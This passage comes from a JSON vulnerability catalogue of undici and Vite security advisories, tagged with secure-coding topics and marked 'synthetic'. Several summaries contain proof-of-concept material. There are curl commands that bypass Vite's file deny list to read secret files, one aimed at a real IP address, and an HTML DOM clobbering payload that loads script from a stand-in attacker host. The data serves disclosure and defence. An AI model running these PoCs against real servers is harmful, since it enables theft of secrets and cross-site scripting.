"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HQVHWAS6WDXXIU7F72XI55VZ2LTZUB33",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NC3V3HFZ5MOJRZDY5ZELL6REIRSPFROJ",
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/P6Q4RGETHVYVHDIQGTJGU5AV6NJEI67E",
"https://security.netapp.com/advisory/ntap-20240905-0008"
],
"aliases": [
"CVE-2024-30261",
"GHSA-9qxr-qj54-h672"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2025-22150": {
"canonical_id": "undici--CVE-2025-22150",
"title": "Use of Insufficiently Random Values in undici",
"summary": "### Impact\n\n[Undici `fetch()` uses Math.random()](https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113) to choose the boundary for a multipart/form-data request. It is known that the output of Math.random() can be predicted if several of its generated values are known.\n\nIf there is a mechanism in an app that sends multipart requests to an attacker-controlled website, they can use this to leak the necessary values. Therefore, An attacker can tamper with the requests going to the backend APIs if certain conditions are met.\n\n### Patches\n\nThis is fixed in 5.28.5; 6.21.1; 7.2.3.\n\n### Workarounds\n\nDo not issue multipart requests to attacker controlled servers.\n\n### References\n\n* https://hackerone.com/reports/2913312\n* https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f\n",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-01-21T21:10:47Z",
"updated_at": "2026-02-04T02:29:26.373390Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-22150",
"https://github.com/nodejs/undici/commit/711e20772764c29f6622ddc937c63b6eefdf07d0",
"https://github.com/nodejs/undici/commit/c2d78cd19fe4f4c621424491e26ce299e65e934a",
"https://github.com/nodejs/undici/commit/c3acc6050b781b827d80c86cbbab34f14458d385",
"https://hackerone.com/reports/2913312",
"https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f",
"https://github.com/nodejs/undici",
"https://github.com/nodejs/undici/blob/8b06b8250907d92fead664b3368f1d2aa27c1f35/lib/web/fetch/body.js#L113"
],
"aliases": [
"CVE-2025-22150",
"GHSA-c76h-2ccp-4975"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2025-47279": {
"canonical_id": "undici--CVE-2025-47279",
"title": "undici Denial of Service attack via bad certificate data",
"summary": "### Impact\n\nApplications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. \n\n### Patches\n\nThis has been patched in https://github.com/nodejs/undici/pull/4088.\n\n### Workarounds\n\nIf a webhook fails, avoid keep calling it repeatedly.\n\n### References\n\nReported as: https://github.com/nodejs/undici/issues/3895",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-05-15T14:15:06Z",
"updated_at": "2026-02-06T22:08:08.311705Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-47279",
"https://github.com/nodejs/undici/issues/3895",
"https://github.com/nodejs/undici/pull/4088",
"https://github.com/nodejs/undici/commit/f317618ec28753a4218beccea048bcf89c36db25",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2025-47279",
"GHSA-cxrh-j4jr-qwg3"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1525": {
"canonical_id": "undici--CVE-2026-1525",
"title": "Undici has an HTTP Request/Response Smuggling issue",
"summary": "### Impact\n\nUndici allows duplicate HTTP `Content-Length` headers when they are provided in an array with case-variant names (e.g., `Content-Length` and `content-length`). This produces malformed HTTP/1.1 requests with multiple conflicting `Content-Length` values on the wire.\n\n**Who is impacted:**\n - Applications using `undici.request()`, `undici.Client`, or similar low-level APIs with headers passed as flat arrays\n - Applications that accept user-controlled header names without case-normalization\n\n**Potential consequences:**\n - **Denial of Service**: Strict HTTP parsers (proxies, servers) will reject requests with duplicate `Content-Length` headers (400 Bad Request)\n - **HTTP Request Smuggling**: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\n If upgrading is not immediately possible:\n\n 1. **Validate header names**: Ensure no duplicate `Content-Length` headers (case-insensitive) are present before passing headers to undici\n 2. **Use object format**: Pass headers as a plain object (`{ 'content-length': '123' }`) rather than an array, which naturally deduplicates by key\n 3. **Sanitize user input**: If headers originate from user input, normalize header names to lowercase and reject duplicates",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:07:03Z",
"updated_at": "2026-03-14T09:19:54.772219Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1525",
"https://hackerone.com/reports/3556037",
"https://cna.openjsf.org/security-advisories.html",
"https://cwe.mitre.org/data/definitions/444.html",
"https://github.com/nodejs/undici",
"https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
],
"aliases": [
"CVE-2026-1525",
"GHSA-2mjp-6q6p-2qxm"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1526": {
"canonical_id": "undici--CVE-2026-1526",
"title": "Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression",
"summary": "## Description\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the `PerMessageDeflate.decompress()` method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\n\n## Impact\n\n- Remote denial of service against any Node.js application using undici's WebSocket client\n- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more\n- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits\n- No application-level mitigation is possible as decompression occurs before message delivery\n\n### Patches\n\nUsers should upgrade to fixed versions.\n\n### Workarounds\n\nNo workaround are possible.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:41:56Z",
"updated_at": "2026-03-13T20:54:25.563997Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1526",
"https://hackerone.com/reports/3481206",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
"https://owasp.org/www-community/attacks/Denial_of_Service"
],
"aliases": [
"CVE-2026-1526",
"GHSA-vrm6-8vpv-qv8q"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1527": {
"canonical_id": "undici--CVE-2026-1527",
"title": "Undici has CRLF Injection in undici via `upgrade` option",
"summary": "### Impact\n\nWhen an application passes user-controlled input to the `upgrade` option of `client.request()`, an attacker can inject CRLF sequences (`\\r\\n`) to:\n\n1. Inject arbitrary HTTP headers\n2. Terminate the HTTP request prematurely and smuggle raw data to non-HTTP services (Redis, Memcached, Elasticsearch)\n\nThe vulnerability exists because undici writes the `upgrade` value directly to the socket without validating for invalid header characters:\n\n```javascript\n// lib/dispatcher/client-h1.js:1121\nif (upgrade) {\n header += `connection: upgrade\\r\\nupgrade: ${upgrade}\\r\\n`\n}\n```\n\n### Patches\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nSanitize the `upgrade` option string before passing to undici:\n\n```javascript\nfunction sanitizeUpgrade(value) {\n if (/[\\r\\n]/.test(value)) {\n throw new Error('Invalid upgrade value')\n }\n return value\n}\n\nclient.request({\n upgrade: sanitizeUpgrade(userInput)\n})\n```",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:41:26Z",
"updated_at": "2026-03-13T20:54:25.572106Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-4992-7rv2-5pvq",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1527",
"https://hackerone.com/reports/3487198",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1527",
"GHSA-4992-7rv2-5pvq"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-1528": {
"canonical_id": "undici--CVE-2026-1528",
"title": "Undici: Malicious WebSocket 64-bit length overflows parser and crashes the client",
"summary": "### Impact\nA server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process. \n\n### Patches\n\n\n Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.\n\n### Workarounds\n\nThere are no workarounds.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:07:26Z",
"updated_at": "2026-03-14T09:17:45.838435Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-f269-vfmq-vjvj",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-1528",
"https://hackerone.com/reports/3537648",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-1528",
"GHSA-f269-vfmq-vjvj"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-22036": {
"canonical_id": "undici--CVE-2026-22036",
"title": "Undici has an unbounded decompression chain in HTTP responses on Node.js Fetch API via Content-Encoding leads to resource exhaustion",
"summary": "### Impact\n\nThe `fetch()` API supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., Content-Encoding: gzip, br). This is also supported by the undici decompress interceptor.\n\nHowever, the number of links in the decompression chain is unbounded and the default maxHeaderSize allows a malicious server to insert thousands compression steps leading to high CPU usage and excessive memory allocation.\n\n### Patches\n\nUpgrade to 7.18.2 or 6.23.0.\n\n### Workarounds\n\nIt is possible to apply an undici interceptor and filter long `Content-Encoding` sequences manually.\n\n### References\n\n* https://hackerone.com/reports/3456148\n* https://github.com/advisories/GHSA-gm62-xv2j-4w53\n* https://curl.se/docs/CVE-2022-32206.html",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-01-14T21:06:08Z",
"updated_at": "2026-02-04T02:56:17.456091Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-g9mf-h72j-4rw9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-22036",
"https://github.com/nodejs/undici/commit/b04e3cbb569c1596f86c108e9b52c79d8475dcb3",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-22036",
"GHSA-g9mf-h72j-4rw9"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-2229": {
"canonical_id": "undici--CVE-2026-2229",
"title": "Undici has Unhandled Exception in WebSocket Client Due to Invalid server_max_window_bits Validation",
"summary": "### Impact\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the `server_max_window_bits` parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range `server_max_window_bits` value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n1. The `isValidClientWindowBits()` function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n2. The `createInflateRaw()` call is not wrapped in a try-catch block\n3. The resulting exception propagates up through the call stack and crashes the Node.js process\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:41:41Z",
"updated_at": "2026-03-13T20:54:26.149214Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2229",
"https://hackerone.com/reports/3487486",
"https://cna.openjsf.org/security-advisories.html",
"https://datatracker.ietf.org/doc/html/rfc7692",
"https://github.com/nodejs/undici",
"https://nodejs.org/api/zlib.html#class-zlibinflateraw"
],
"aliases": [
"CVE-2026-2229",
"GHSA-v9p9-hfj2-hcw8"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"undici--CVE-2026-2581": {
"canonical_id": "undici--CVE-2026-2581",
"title": "Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS",
"summary": "## Impact\nThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when `interceptors.deduplicate()` is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\n## Patches\n\nThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\n\n## Workarounds\nIf upgrading immediately is not possible:\n\n- Disable `interceptors.deduplicate()` for affected clients/routes.\n- Use `skipHeaderNames` with a marker header to force high-risk requests to bypass deduplication.\n- Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.\n- Apply upstream/proxy response-size and timeout limits.",
"display_name": "Undici",
"system_id": "undici",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2026-03-13T20:37:58Z",
"updated_at": "2026-03-13T20:54:25.417862Z",
"official_source_url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2581",
"https://hackerone.com/reports/3513473",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/nodejs/undici"
],
"aliases": [
"CVE-2026-2581",
"GHSA-phc3-fgpg-7m6h"
],
"secure_code_topics": [
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2024-23331": {
"canonical_id": "vite--CVE-2024-23331",
"title": "Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem",
"summary": "### Summary\n[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.\n\nThis bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.\n\n### Patches\nFixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17\n\n### Details\nSince `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. \n\nSee `picomatch` usage, where `nocase` is defaulted to `false`: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632\n\nBy requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. \n\n### PoC\n**Setup**\n1. Created vanilla Vite project using `npm create vite@latest` on a Standard Azure hosted Windows 10 instance. \n - `npm run dev -- --host 0.0.0.0`\n - Publicly accessible for the time being here: http://20.12.242.81:5173/ \n2. Created dummy secret files, e.g. `custom.secret` and `production.pem`\n3. Populated `vite.config.js` with\n```javascript\nexport default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }\n```\n\n**Reproduction**\n1. `curl -s http://20.12.242.81:5173/@fs//`\n - Descriptive error page reveals absolute filesystem path to project root\n2. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js`\n - Discoverable configuration file reveals locations of secrets\n3. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT`\n - Secrets are directly accessible using case-augmented version of filename\n\n**Proof**\n![Screenshot 2024-01-19 022736](https://user-images.githubusercontent.com/907968/298020728-3a8d3c06-fcfd-4009-9182-e842f66a6ea5.png)\n\n### Impact\n**Who**\n- Users with exposed dev servers on environments with case-insensitive filesystems\n\n**What**\n- Files protected by `server.fs.deny` are both discoverable, and accessible",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-01-19T21:58:47Z",
"updated_at": "2026-02-04T04:17:01.410592Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2023-34092",
"https://nvd.nist.gov/vuln/detail/CVE-2024-23331",
"https://github.com/vitejs/vite/commit/0cd769c279724cf27934b1270fbdd45d68217691",
"https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5",
"https://github.com/vitejs/vite/commit/a26c87d20f9af306b5ce3ff1648be7fa5146c278",
"https://github.com/vitejs/vite/commit/eeec23bbc9d476c54a3a6d36e78455867185a7cb",
"https://github.com/vitejs/vite",
"https://vitejs.dev/config/server-options.html#server-fs-deny"
],
"aliases": [
"CVE-2024-23331",
"GHSA-c24v-8rfc-w8vw"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2024-45811": {
"canonical_id": "vite--CVE-2024-45811",
"title": "Vite's `server.fs.deny` is bypassed when using `?import&raw`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-09-17T18:44:12Z",
"updated_at": "2026-02-04T04:05:31.919291Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-45811",
"https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249",
"https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34",
"https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd",
"https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6",
"https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2024-45811",
"GHSA-9cwx-2883-4wfx"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2024-45812": {
"canonical_id": "vite--CVE-2024-45812",
"title": "Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS",
"summary": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.\n\nNote that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n\n### Details\n\n**Backgrounds**\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n**Gadgets found in Vite**\n\nWe have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n```\nconst relativeUrlMechanisms = {\n amd: (relativePath) => {\n if (relativePath[0] !== \".\") relativePath = \"./\" + relativePath;\n return getResolveUrl(\n `require.toUrl('${escapeId(relativePath)}'), document.baseURI`\n );\n },\n cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath)})`,\n es: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`\n ),\n iife: (relativePath) => getRelativeUrlFromDocument(relativePath),\n // NOTE: make sure rollup generate `module` params\n system: (relativePath) => getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`\n ),\n umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath, true)})`\n};\n```\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. \n\n```\n// main.js\nimport extraURL from './extra.js?url'\nvar s = document.createElement('script')\ns.src = extraURL\ndocument.head.append(s)\n```\n\n```\n// extra.js\nexport default \"https://myserver/justAnOther.js\"\n```\n\n```\n// vite.config.js\nimport { defineConfig } from 'vite'\n\nexport default defineConfig({\n build: {\n assetsInlineLimit: 0, // To avoid inline assets for PoC\n rollupOptions: {\n output: {\n format: \"cjs\"\n },\n },\n },\n base: \"./\",\n});\n```\n\nAfter running the build command, the developer will get following bundle as the output.\n\n```\n// dist/index-DDmIg9VD.js\n\"use strict\";const t=\"\"+(typeof document>\"u\"?require(\"url\").pathToFileURL(__dirname+\"/extra-BLVEx9Lb.js\").href:new URL(\"extra-BLVEx9Lb.js\",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement(\"script\");e.src=t;document.head.append(e);\n```\n\nAdding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n\n```\n<!DOCTYPE html>\n<html>\n<head>\n <title>Vite Example</title>\n <!-- Attacker-controlled Script-less HTML Element starts--!>\n <img name=\"currentScript\" src=\"https://attacker.controlled.server/\"></img>\n <!-- Attacker-controlled Script-less HTML Element ends--!>\n</head>\n<script type=\"module\" crossorigin src=\"/assets/index-DDmIg9VD.js\"></script>\n<body>\n</body>\n</html>\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.\n\n### Patch\n\n```\n// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =>\n getResolveUrl(\n `'${escapeId(partialEncodeURIPath(relativePath))}', ${\n umd ? `typeof document === 'undefined' ? location.href : ` : ''\n }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,\n )\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2024-09-17T19:28:01Z",
"updated_at": "2026-02-04T04:04:22.977459Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3",
"secondary_source_urls": [
"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"https://nvd.nist.gov/vuln/detail/CVE-2024-45812",
"https://github.com/vitejs/vite/commit/179b17773cf35c73ddb041f9e6c703fd9f3126af",
"https://github.com/vitejs/vite/commit/2691bb3ff6b073b41fb9046909e1e03a74e36675",
"https://github.com/vitejs/vite/commit/2ddd8541ec3b2d2e5b698749e0f2362ef28056bd",
"https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad",
"https://github.com/vitejs/vite/commit/e8127166979e7ace6eeaa2c3b733c8994caa31f3",
"https://github.com/vitejs/vite/commit/ebb94c5b3bf41950f45562595adec117a4d0ba5e",
"https://github.com/vitejs/vite",
"https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"https://scnps.co/papers/sp23_domclob.pdf"
],
"aliases": [
"CVE-2024-45812",
"GHSA-64vr-g452-qvp3"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"xss-output-encoding",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-24010": {
"canonical_id": "vite--CVE-2025-24010",
"title": "Websites were able to send any requests to the development server and read the response in vite",
